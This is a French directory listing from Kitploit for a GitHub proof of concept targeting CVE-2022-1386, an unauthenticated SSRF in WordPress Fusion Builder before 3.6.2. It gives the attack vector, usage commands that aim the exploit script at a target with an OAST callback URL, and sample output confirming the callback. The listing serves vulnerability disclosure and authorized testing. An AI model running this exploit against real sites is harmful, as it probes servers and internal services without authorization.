Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-1386-FusionBuilder-SSRF — PoC de SSRF non authentifié dans WordPress Fusion Builder <3.6.2 (CVE-2022-1386) | Kitploit
Outils/GitHubGitHub/fayassgit/cve-2022-1386-fusionbuilder-ssrf
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubfayassgit/cve-2022-1386-fusionbuilder-ssrf

CVE-2022-1386-FusionBuilder-SSRF

PoC de SSRF non authentifié dans WordPress Fusion Builder <3.6.2 (CVE-2022-1386)

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
2il y a 1 anPas encore vérifié

CVE-2022-1386 – Fusion Builder < 3.6.2 - SSRF non authentifié

💥 Description

Falsification de requête côté serveur (SSRF) non authentifiée dans le plugin Fusion Builder (utilisé par le thème Avada WordPress) avant la version 3.6.2.
Permet aux attaquants d'effectuer des requêtes HTTP vers des URL arbitraires, ciblant potentiellement des services internes.

🛡 Produit affecté

  • Fusion Builder < 3.6.2
  • Installations du thème Avada utilisant le plugin Fusion Builder vulnérable

🔍 Détails CVE

  • CVE: CVE-2022-1386
  • Gravité: Critique
  • Vecteur: HTTP POST non authentifié vers admin-ajax.php

🧪 Utilisation du PoC

root@kitploit:~
python3 exploit_cve_2022_1386.py <target_url> <your_callback_url>

Exemple :

root@kitploit:~
python3 exploit_cve_2022_1386.py https://vulnerable.site https://abc123.oast.fun

Utilisez Interact.sh ou [Burp Collaborator] pour recevoir le callback.

📋 Exemple de sortie

root@kitploit:~
[*] Fetching nonce from target...
[*] Sending SSRF payload to https://abc123.oast.fun...
[+] SSRF confirmed: received callback from victim server.

📌 Notes

Ce PoC évite l'exfiltration de données. Utilisation éthique uniquement : n'exploitez pas les systèmes sans autorisation.

📚 Références

https://wpscan.com/vulnerability/bf7034ab-24c4-461f-a709-3f73988b536b https://theme-fusion.com/documentation/avada/fusion-builder-changelog/

Télécharger l’outil